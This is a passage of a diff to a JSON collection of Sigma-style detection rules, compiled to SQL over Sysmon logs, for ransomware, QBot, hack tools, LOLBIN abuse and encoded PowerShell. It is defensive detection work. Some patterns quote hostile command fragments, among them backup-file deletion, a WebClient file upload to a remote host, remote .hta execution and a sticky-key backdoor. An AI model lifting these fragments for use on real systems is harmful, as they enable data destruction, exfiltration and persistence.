'%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine 